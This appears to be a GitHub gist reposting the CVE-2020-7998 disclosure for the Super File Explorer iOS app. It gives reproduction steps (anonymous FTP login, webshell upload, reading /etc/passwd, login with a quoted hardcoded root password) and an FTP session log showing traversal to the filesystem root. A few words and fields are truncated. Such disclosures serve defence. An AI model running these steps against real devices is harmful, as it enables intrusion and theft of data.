Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
CVE-2020-7998 arbitrary file upload web vulnerability Super File Explorer app for iOS
An arbitrary file upload web vulnerability has been discovered in the
> Super File Explorer app for iOS.
> The vulnerability is located in the developer path that is accessible
> and hidden next to the root path.
> By default, there is no password set for the FTP or Web UI service.
he arbitrary file
> upload web vulnerability can be exploited by remote attackers without
> privilege application user account or user interaction. For security
> demonstration or to reproduce the vulnerability follow the provided
> information and steps below to continue.
>
> Manual steps to reproduce the vulnerability ... 1. Install the
> vulnerable mobile ios application to your test iDevice (iphone) 2.
> Start the mobile device software 3. Start the ftp and web-server via
> remote manager button push 4. Open the ftp via console and login as
> random user with any credentials 5. Move to the developer path in the
> upper folder 6. Upload of a remote system or the local system path via
> network a webshell 7. Open ftp web ui url (http://localhost) and move
> to the developer path 8. Open the webshell and request via GET the
> "/etc/passwd" file that is accessible 9. Login again to the ftp server
> using the root:smx7MYTQIi2M 10. Successful root access to compromise
> the ftp server and mobile via arbitrary file upload vulnerability!
>
> FTP WEB UI URL: http://localhost
>
> FTP SERVER URL: localhost:2121
>
> --- PoC Exploitation --- C:UsersAdmin>ftp ftp> open 192.168.2.241 2121
> Verbindung mit 192.168.2.241 wurde hergestellt. 220 iosFtp server
> ready. 502 Unknown command 'UTF8' Benutzer (192.168.2.241:(none)):
> anonymous 331 Password required for anonymous Kennwort: a@b.com 230
> User anonymous logged in. ftp> cd .. 250 CWD command successful. ftp>
> dir 200 PORT command successful. 150 Opening ASCII mode data connection
> for '/bin/ls'. total 3 drwxr-xr-x 1 mobile mobile 68 Feb 17 22:02
> Documents drwxr-xr-x 3 mobile mobile 170 Feb 17 22:05 Library
> drwxr-xr-x 1 mobile mobile 68 Feb 17 22:02 tmp 226 Transfer complete.
> FTP: 199 Bytes empfangen in 0.01Sekunden 13.27KB/s ftp> cd /../ 250 CWD
> command successful. ftp> dir 200 PORT command successful. 150 Opening
> ASCII mode data connection for '/bin/ls'. total 13 ---------- 1 (null)
> (null) 0 (null) Applications drwxrwxr-x 1 root admin 68 May 29 23:45
> Developer ---------- 1 (null) (null) 0 (null) Library ---------- 1
> (null) (null) 0 (null) System ---------- 1 (null) (null) 0 (null) bin
> ---------- 1 (null) (null) 0 (null) cores ---------- 1 (null) (null) 0
> (null) dev ---------- 1 (null) (null) 0 (null) etc ---------
>
> ------------------------------------------
>
> [VulnerabilityType Other]
> Arbitrary File Upload Vulnerability
>
> ------------------------------------------
>
> [Vendor of Product]
> Super File Explorer 1.0.
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Super File Explorer 1.0. - le Explorer 1.0.
>
> ------------------------------------------
>
> [Affected Component]
> LZX Apps
> Product: Super File Explorer - File Viewer & File Manager (Wifi UI & FTP) 1.0.1
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
>
> [Discoverer]
> Adesh Nandkishor Kolte
>
> ------------------------------------------
>
> [Reference]
> https://apps.apple.com/us/app/super-file-explorer-file-viewer-file-manager/id1101973946
Use CVE-2020-7998.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.